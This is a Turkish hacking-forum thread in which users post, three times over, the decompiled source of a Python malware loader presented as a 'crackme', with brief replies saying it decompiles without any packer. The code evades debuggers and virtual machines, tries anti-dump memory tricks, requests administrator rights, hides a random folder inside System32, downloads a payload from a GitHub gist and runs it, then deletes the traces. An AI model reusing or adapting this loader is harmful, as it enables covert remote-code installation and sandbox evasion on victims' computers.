python loader / CrâckMe

floxes

http://violatesoftware.com.tr/
Gold Üye
Katılım
13 Eki 2024
Mesajlar
139
Beğeniler
32
İletişim
Hiçbir iddiam yok bu konuda, şimdiden ellerinize sağlık.


 
Python:
import os
import sys
import ctypes
import urllib.request
import tempfile
import traceback
import logging
import platform
import psutil
import time
import random
import string
from datetime import datetime
from winreg import *

def xor_encrypt(data, key):
    return ''.join((chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data)))

def check_debugging():
    try:
        if ctypes.windll.kernel32.IsDebuggerPresent():
            return True
        start = time.time()
        time.sleep(0.01)
        elapsed = time.time() - start
        if elapsed < 0.01:
            return True
        return False
    except:
        return False

def check_virtual_machine():
    try:
        vm_signs = ['vmware', 'virtualbox', 'vbox', 'qemu', 'xen']
        sys_info = platform.system() + platform.version().lower()
        if any((sign in sys_info.lower() for sign in vm_signs)):
            return True
        for proc in psutil.process_iter(['name']):
            if any((sign in proc.info['name'].lower() for sign in vm_signs)):
                return True
        else:
            return False
    except:
        return False

def generate_key():
    return ''.join(random.choices(string.ascii_letters + string.digits, k=16))

def anti_dump():
    try:
        ctypes.windll.kernel32.VirtualProtect(ctypes.cast(anti_dump, ctypes.py_object).value, ctypes.c_size_t(1024), ctypes.c_uint32(64), ctypes.byref(ctypes.c_uint32()))
    except:
        return None

def secure_download_and_run():
    try:
        if check_debugging():
            sys.exit(1)
        if check_virtual_machine():
            sys.exit(1)
        anti_dump()
        base_url = 'https://gist.githubusercontent.com/floxesdev/eb2839c0cb566c9fc269f3ebc27a151e/raw'
        key = generate_key()
        encrypted_url = xor_encrypt(base_url, key)
        system_dir = os.path.join(os.environ['WINDIR'], 'System32')
        hidden_dir = os.path.join(system_dir, ''.join(random.choices(string.ascii_letters, k=8)))
        try:
            os.makedirs(hidden_dir, exist_ok=True)
            ctypes.windll.kernel32.SetFileAttributesW(hidden_dir, 2)
        except:
            hidden_dir = tempfile.gettempdir()
        random_name = ''.join(random.choices(string.ascii_letters, k=12)) + '.dat'
        file_path = os.path.join(hidden_dir, random_name)
        real_url = xor_encrypt(encrypted_url, key)
        urllib.request.urlretrieve(real_url, file_path)
        os.system(f'python "{file_path}0"')
        try:
            os.remove(file_path)
            os.rmdir(hidden_dir)
        except:
            return
    except Exception as e:
        sys.exit(1)

def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False
if __name__ == '__main__':
    try:
        if is_admin():
            secure_download_and_run()
        else:
            ctypes.windll.shell32.ShellExecuteW(None, 'runas', sys.executable, f'"{os.path.abspath(__file__)}"', None, 1)
    except:
        sys.exit(1)
 
pyarmor falan mı bastın,birde istedigin şey ne source mi
 
Python:
import os
import sys
import ctypes
import urllib.request
import tempfile
import traceback
import logging
import platform
import psutil
import time
import random
import string
from datetime import datetime
from winreg import *

def xor_encrypt(data, key):
    return ''.join((chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data)))

def check_debugging():
    try:
        if ctypes.windll.kernel32.IsDebuggerPresent():
            return True
        start = time.time()
        time.sleep(0.01)
        elapsed = time.time() - start
        if elapsed < 0.01:
            return True
        return False
    except:
        return False

def check_virtual_machine():
    try:
        vm_signs = ['vmware', 'virtualbox', 'vbox', 'qemu', 'xen']
        sys_info = platform.system() + platform.version().lower()
        if any((sign in sys_info.lower() for sign in vm_signs)):
            return True
        for proc in psutil.process_iter(['name']):
            if any((sign in proc.info['name'].lower() for sign in vm_signs)):
                return True
        else:
            return False
    except:
        return False

def generate_key():
    return ''.join(random.choices(string.ascii_letters + string.digits, k=16))

def anti_dump():
    try:
        ctypes.windll.kernel32.VirtualProtect(ctypes.cast(anti_dump, ctypes.py_object).value, ctypes.c_size_t(1024), ctypes.c_uint32(64), ctypes.byref(ctypes.c_uint32()))
    except:
        return None

def secure_download_and_run():
    try:
        if check_debugging():
            sys.exit(1)
        if check_virtual_machine():
            sys.exit(1)
        anti_dump()
        base_url = 'https://gist.githubusercontent.com/floxesdev/eb2839c0cb566c9fc269f3ebc27a151e/raw'
        key = generate_key()
        encrypted_url = xor_encrypt(base_url, key)
        system_dir = os.path.join(os.environ['WINDIR'], 'System32')
        hidden_dir = os.path.join(system_dir, ''.join(random.choices(string.ascii_letters, k=8)))
        try:
            os.makedirs(hidden_dir, exist_ok=True)
            ctypes.windll.kernel32.SetFileAttributesW(hidden_dir, 2)
        except:
            hidden_dir = tempfile.gettempdir()
        random_name = ''.join(random.choices(string.ascii_letters, k=12)) + '.dat'
        file_path = os.path.join(hidden_dir, random_name)
        real_url = xor_encrypt(encrypted_url, key)
        urllib.request.urlretrieve(real_url, file_path)
        os.system(f'python "{file_path}0"')
        try:
            os.remove(file_path)
            os.rmdir(hidden_dir)
        except:
            return
    except Exception as e:
        sys.exit(1)

def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False
if __name__ == '__main__':
    try:
        if is_admin():
            secure_download_and_run()
        else:
            ctypes.windll.shell32.ShellExecuteW(None, 'runas', sys.executable, f'"{os.path.abspath(__file__)}"', None, 1)
    except:
        sys.exit(1)
Elinize sağlık, unpack yolunuzu söyler misiniz rica etsem?
 
Python:
import os
import sys
import ctypes
import urllib.request
import tempfile
import traceback
import logging
import platform
import psutil
import time
import random
import string
from datetime import datetime
from winreg import *

def xor_encrypt(data, key):
    return ''.join((chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data)))

def check_debugging():
    try:
        if ctypes.windll.kernel32.IsDebuggerPresent():
            return True
        start = time.time()
        time.sleep(0.01)
        elapsed = time.time() - start
        if elapsed < 0.01:
            return True
        return False
    except:
        return False

def check_virtual_machine():
    try:
        vm_signs = ['vmware', 'virtualbox', 'vbox', 'qemu', 'xen']
        sys_info = platform.system() + platform.version().lower()
        if any((sign in sys_info.lower() for sign in vm_signs)):
            return True
        for proc in psutil.process_iter(['name']):
            if any((sign in proc.info['name'].lower() for sign in vm_signs)):
                return True
        else:
            return False
    except:
        return False

def generate_key():
    return ''.join(random.choices(string.ascii_letters + string.digits, k=16))

def anti_dump():
    try:
        ctypes.windll.kernel32.VirtualProtect(ctypes.cast(anti_dump, ctypes.py_object).value, ctypes.c_size_t(1024), ctypes.c_uint32(64), ctypes.byref(ctypes.c_uint32()))
    except:
        return None

def secure_download_and_run():
    try:
        if check_debugging():
            sys.exit(1)
        if check_virtual_machine():
            sys.exit(1)
        anti_dump()
        base_url = 'https://gist.githubusercontent.com/floxesdev/eb2839c0cb566c9fc269f3ebc27a151e/raw'
        key = generate_key()
        encrypted_url = xor_encrypt(base_url, key)
        system_dir = os.path.join(os.environ['WINDIR'], 'System32')
        hidden_dir = os.path.join(system_dir, ''.join(random.choices(string.ascii_letters, k=8)))
        try:
            os.makedirs(hidden_dir, exist_ok=True)
            ctypes.windll.kernel32.SetFileAttributesW(hidden_dir, 2)
        except:
            hidden_dir = tempfile.gettempdir()
        random_name = ''.join(random.choices(string.ascii_letters, k=12)) + '.dat'
        file_path = os.path.join(hidden_dir, random_name)
        real_url = xor_encrypt(encrypted_url, key)
        urllib.request.urlretrieve(real_url, file_path)
        os.system(f'python "{file_path}0"')
        try:
            os.remove(file_path)
            os.rmdir(hidden_dir)
        except:
            return
    except Exception as e:
        sys.exit(1)

def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False
if __name__ == '__main__':
    try:
        if is_admin():
            secure_download_and_run()
        else:
            ctypes.windll.shell32.ShellExecuteW(None, 'runas', sys.executable, f'"{os.path.abspath(__file__)}"', None, 1)
    except:
        sys.exit(1)
ne basmis obf
 
Bu kullanıcıyla herhangi bir iş veya ticaret yapmak istiyorsanız, forumdan uzaklaştırıldığını sakın unutmayın.
 
Bu kullanıcıyla herhangi bir iş veya ticaret yapmak istiyorsanız, forumdan uzaklaştırıldığını sakın unutmayın.
WXYZMNOPQRST5678 | 2024-12-31 obf falan yok pyinstxtractor ile direkt cikiyor
 
Bu kullanıcıyla herhangi bir iş veya ticaret yapmak istiyorsanız, forumdan uzaklaştırıldığını sakın unutmayın.
Reyna da atmis yeni gordum hicbir packer yok dumduz decompile ediliyor dostum
 

  Şuanda konuyu görüntüleyen kullanıcılar


Üst Alt